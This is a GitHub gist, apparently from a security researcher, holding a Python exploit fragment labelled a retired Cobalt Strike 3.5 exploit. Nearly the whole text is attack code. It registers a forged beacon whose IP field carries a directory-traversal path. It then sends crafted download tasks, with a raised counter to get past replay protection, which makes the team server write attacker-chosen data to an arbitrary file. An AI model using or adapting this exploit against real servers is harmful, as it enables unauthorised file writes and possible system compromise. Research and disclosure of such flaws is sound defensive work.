Last active
August 5, 2021 15:51
-
-
Save olliencc/0e7c5e0287b85f0b8cb47cfa16616448 to your computer and use it in GitHub Desktop.
Retired Cobalt Strike 3.5 exploit example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# First we need to register a beacon with a directory traversal in the ip address field | |
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
# Generate symmetric keys (used later) | |
raw_aes_keys = os.urandom(16) | |
aes_key, hmac_key = generate_keys(raw_aes_keys) | |
m = Metadata(public_key=args.public_key, cs_version=3) | |
m.public_key = args.public_key | |
m.bid = args.bid | |
m.pid = args.pid | |
m.ver = "10.0" | |
m.intz = ip_address | |
m.comp = args.computer | |
m.user = args.username | |
m.is64 = '1' # 64-bit OS | |
m.barch = '1' # 64-bit beacon | |
m.raw_aes_keys = raw_aes_keys | |
m.calculate_aes() | |
enc = m.pack() | |
# register the beacon | |
print "[*] Staging beacon .." | |
register_beacon(enc, args.target, args.uri, args.host, args.ssl) | |
# Now we need to push a DOWNLOAD_START response to cause a file write | |
print "[*] Creating file .." | |
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key) | |
# Send it to the server. This is the equivalent of touch(filepath) | |
# submit.php should be replaced with malleable C2 setting if applicable | |
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl) | |
# Build another task which is going to write the data to the touched file | |
# We force the counter to be higher than the last task to avoid replay protection | |
print "[*] Sending data .." | |
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100) | |
# Fire it.. | |
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl) | |
print "[+] Done!" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment